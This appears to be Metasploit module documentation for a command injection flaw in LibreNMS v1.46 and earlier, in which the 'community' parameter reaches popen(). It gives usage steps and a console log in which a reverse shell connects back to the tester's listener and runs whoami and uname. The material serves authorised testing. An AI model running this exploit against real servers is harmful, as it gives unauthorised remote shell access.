## Description
  
  In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
  The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
  a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
  and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
  is passed to the `popen()` function, which results in execution of arbitrary code.

  This module has been tested on LibreNMS `v1.46` and `v1.45`.

## Vulnerable Application

  A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.

  Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
  In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
  4. Do: ```set RHOSTS <ip>```
  5. Do: ```set USERNAME <user>```
  6. Do: ```set PASSWORD <pass>```
  7. Do: ```run```
  8. You should get a shell.

## Scenarios

### Tested on LibreNMS 1.46 on Ubuntu 18.04

  ```
  msf > use exploit/linux/http/librenms_addhost_cmd_inject
  msf exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
  rhosts => 192.168.37.143
  msf exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
  username => blah
  msf exploit(linux/http/librenms_addhost_cmd_inject) > set password password
  password => password
  msf exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf exploit(linux/http/librenms_addhost_cmd_inject) > run

  [*] Started reverse TCP double handler on 192.168.37.1:4444 
  [*] Successfully logged into LibreNMS
  [+] Successfully added device with hostname dFEzcH
  [*] Accepted the first client connection...
  [*] Accepted the second client connection...
  [+] Successfully deleted device with hostname dFEzcH and id #126
  [*] Command: echo 38eJIFZsiRl3Er48;
  [*] Writing to socket A
  [*] Writing to socket B
  [*] Reading from sockets...
  [*] Reading from socket A
  [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
  [*] Matching...
  [*] B is input...
  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500

  whoami
  www-data
  uname -a
  Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
  ```
